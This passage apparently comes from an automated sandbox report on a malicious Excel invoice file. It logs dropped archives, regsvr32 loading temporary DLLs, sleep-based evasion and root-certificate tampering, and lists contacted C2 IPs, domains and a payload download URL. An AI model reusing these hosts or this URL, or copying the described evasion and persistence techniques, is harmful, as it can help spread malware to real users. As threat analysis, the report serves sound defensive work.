Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file

Is looking for software installed on the system

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key enumerated: More than 470 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1796	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -159000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -138000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -290000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -263000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -137000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -122000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -135000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -175000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -243000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -399000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -179000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -650000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -168000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -332000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -142000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -292000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -169000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -304000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -468000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -125000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -132000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -321000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -158000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -294000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -278000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -141000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -167000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -151000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -309000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -310000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -157000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -322000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -267000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -336000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -139000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -171000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -276000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -426000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -166000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -302000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -264000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -317000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -152000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -522000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -588000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -172000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -127000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -318000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -131000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -252000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -160000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -263000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -163000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -134000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -135000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -313000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -133000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -271000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -161000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -241000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -164000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -153000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -175000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -170000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -343000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -121000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2128	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -171000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -310000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -261000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -126000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -139000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -345000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -256000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -334000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -250000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -178000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -311000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -172000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -316000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -147000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3068	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -122000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -124000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -178000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -158000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -257000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -170000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -156000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1036	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -136000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 194.225.58.214 187

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll

Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
69.164.207.140	unknown	United States	63949	LINODE-APLinodeLLCUS	true
192.185.224.50	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false
211.110.44.63	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
191.252.144.65	unknown	Brazil	27715	LocawebServicosdeInternetSABR	false
194.225.58.214	unknown	Iran (ISLAMIC Republic Of)	43965	TUMS-IR-ASIR	true
103.83.81.27	unknown	India	138251	ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN	false
198.57.200.100	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
198.136.54.91	unknown	United States	33182	DIMENOCUS	false
64.37.52.172	unknown	United States	33182	DIMENOCUS	false

Contacted Domains

Name	IP	Active
creditoenusa.com	192.185.224.50	true
stellarum.com.br	191.252.144.65	true
qsf.surfescape.net	64.37.52.172	true
reliablelifts.co.in	103.83.81.27	true
shopandmartonline.com	198.136.54.91	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://stellarum.com.br/hknmwj.zip	false	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Virustotal: Detection: 27%

Perma Link

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0

Uses new MSVCR Dlls

